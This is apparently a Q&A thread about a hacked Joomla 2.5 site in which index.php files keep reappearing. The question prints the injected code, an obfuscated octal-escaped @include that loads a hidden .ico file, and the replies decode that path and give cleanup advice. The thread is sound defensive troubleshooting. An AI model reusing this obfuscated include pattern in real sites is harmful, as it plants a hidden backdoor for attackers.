# Some index.php files generating or comes automatically in my doucment root folder

Tags: php

Index.php files comes automatically

i scan the index.php files with RSfirewall.
it is in joomla 2.5

```
<?php
/*df76c*/

@include "\057ho\155e/\145ar\164ht\157he\141ve\156co\057pu\142li\143_h  \164ml\057li\142ra\162ie\163/f\060f/\151nt\145gr\141ti\157n/\05659\06725\06435\056ic\157";

/*df76c*/
```

Comment: You've been pwn'd. Check your server for a file at `/home/earthtoheavenco/public_html/libraries/f0f/integration/.59725435.ico` - this is almost certainly a hacker's malware.

Comment: https://codex.wordpress.org/FAQ_My_site_was_hacked - WP reference for the same

Comment: is there any method so i can remove this malware totally from my code ??

Comment: Unfortunately - no. What you could do is rollback from a backup if you've been keeping them.

Answer (score 0):

This looks like your website is hacked. Please change your server credentials and database credentials first.

if you want to check the which file is called, you simply echo the statement and you will get that file.

```
<?php
/*df76c*/

echo "\057ho\155e/\145ar\164ht\157he\141ve\156co\057pu\142li\143_h  \164ml\057li\142ra\162ie\163/f\060f/\151nt\145gr\141ti\157n/\05659\06725\06435\056ic\157";

/*df76c*/
?>
```

This will return your server path with the infected file main script.

```
/home/earthtoheavenco/public_h tml/libraries/f0f/integration/.59725435.ico
```

Please delete all such files from your server.

Hope this will help.

Comment: its all done but when i delete this files and scan with RSfirewall after 2-3 days it comes again.

Comment: @AnilJahangir some of the ports on your server are open and change file permission which allow publicaly write access

Comment: how can i check this publicaly write access in my WHM. is there any command or option in WHM.